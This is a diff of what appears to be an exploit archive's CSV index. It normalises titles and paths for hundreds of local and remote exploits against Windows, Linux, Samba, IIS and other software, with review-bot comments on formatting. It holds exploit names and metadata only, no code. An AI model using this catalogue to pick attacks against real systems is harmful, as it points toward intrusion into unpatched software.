15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0
15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0
15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0
15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - (SEH) Exploit",2010-09-27,"sanjeev gupta",windows,local,0
15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Exploit (SEH)",2010-09-27,"sanjeev gupta",windows,local,0
15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0
15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0
@ -6957,7 +6957,7 @@ id,file,description,date,author,platform,type,port
15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0
15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
15706,platforms/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local,0
15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0
15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow",2010-12-12,m_101,windows,local,0
@ -6977,14 +6977,14 @@ id,file,description,date,author,platform,type,port
15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (SEH Unicode)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0
15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0
15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0
16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0
15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0
15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0
16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0
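Review bot: 15962 in the context lines is titled "Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation" but filed under platforms/solaris with platform "solaris"; the "Linux Kernel" prefix contradicts the platform and looks like a carry-over from the neighbouring kernel entries, so it is worth checking while this block is touched.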
@ -7094,7 +7094,7 @@ id,file,description,date,author,platform,type,port
16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0
16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local,0
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - (SEH) Exploit",2011-03-18,"Anastasios Monachos",windows,local,0
16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Exploit (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0
17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0
17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0
17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0
@ -7149,7 +7149,7 @@ id,file,description,date,author,platform,type,port
17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0
17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0
17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
@ -7222,12 +7222,12 @@ id,file,description,date,author,platform,type,port
18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0
18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0
18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (SEH Unicode) (Metasploit)",2012-01-17,Metasploit,windows,local,0
18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0
18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
@ -7676,7 +7676,7 @@ id,file,description,date,author,platform,type,port
20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0
20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0
20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0
20341,platforms/linux/local/20341.sh,"Samba 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0
20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0
20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0
20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0
20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0
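Review bot: 20333 in the context lines reads "Exim Buffer 1.6.2/1.6.51 - Overflow Exploit", with "Buffer" separated from "Overflow" by the version string; since this hunk already normalises a title in this block, suggest "Exim 1.6.2/1.6.51 - Buffer Overflow" to match the "Product Version - Issue" pattern used throughout the file.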
@ -8314,7 +8314,7 @@ id,file,description,date,author,platform,type,port
26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0
26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0
26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0
26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - (SEH) Overflow",2013-07-01,"Jacob Holcomb",windows,local,0
26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - Overflow (SEH)",2013-07-01,"Jacob Holcomb",windows,local,0
26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0
26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0
26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0
@ -8412,7 +8412,7 @@ id,file,description,date,author,platform,type,port
29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0
29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)",2013-11-12,"Mike Czumak",windows,local,0
29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0
29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
@ -8422,9 +8422,9 @@ id,file,description,date,author,platform,type,port
29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0
29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0
29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0
29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH Unicode)",2013-11-22,"Mike Czumak",windows,local,0
30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local,0
30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)",2013-12-09,"Mike Czumak",windows,local,0
30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",windows,local,0
30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0
29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
29801,platforms/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0
@ -8696,7 +8696,7 @@ id,file,description,date,author,platform,type,port
36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0
36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,windows,local,0
36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)",2015-04-24,naxxo,windows,local,0
36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
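Review bot: the 36822 rename drops the stray opening quote in `'search textbox` instead of closing it; the file's convention in this same hunk (`'m3u'`, `'.wav'`, `'.pls'`) is to quote the affected field as one unit, so `'search textbox' Buffer Overflow (SEH Unicode) (Egghunter)` would be the consistent form rather than leaving the field unquoted.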
@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port
38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local,0
40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,windows,local,0
38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
@ -8824,8 +8824,8 @@ id,file,description,date,author,platform,type,port
38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0
38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0
38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0
38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0
38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0
38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0
38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0
38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
@ -9228,12 +9228,15 @@ id,file,description,date,author,platform,type,port
42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
10,platforms/linux/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
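Review bot: the entry for id 10 changes its path from platforms/linux/remote/10.c to platforms/multiple/remote/10.c (platform column linux to multiple, consistent with the '(Linux/BSD)' in the title); this must be paired with moving the file itself in the same commit, otherwise the index points at a path that no longer exists. The three added entries (42624, 42625, 42626) keep the id, path and platform columns consistent with the surrounding local entries.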
@ -9387,7 +9390,7 @@ id,file,description,date,author,platform,type,port
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535
361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell",2004-08-04,infamous41md,linux,remote,21
378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21
@ -10515,7 +10518,7 @@ id,file,description,date,author,platform,type,port
9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660
9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660
9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0
9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0
9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0
@ -10560,7 +10563,7 @@ id,file,description,date,author,platform,type,port
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0
9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0
9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0
9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123
@ -10645,7 +10648,7 @@ id,file,description,date,author,platform,type,port
10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0
14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0
10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - (SEH) Exploit",2009-12-29,Lincoln,windows,remote,6660
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660
10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0
@ -10756,7 +10759,7 @@ id,file,description,date,author,platform,type,port
13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0
13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80
13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0
13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Exploit (SEH)",2010-06-17,b0nd,windows,remote,0
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
@ -10973,7 +10976,7 @@ id,file,description,date,author,platform,type,port
16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0
16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0
16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
16320,platforms/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote,0
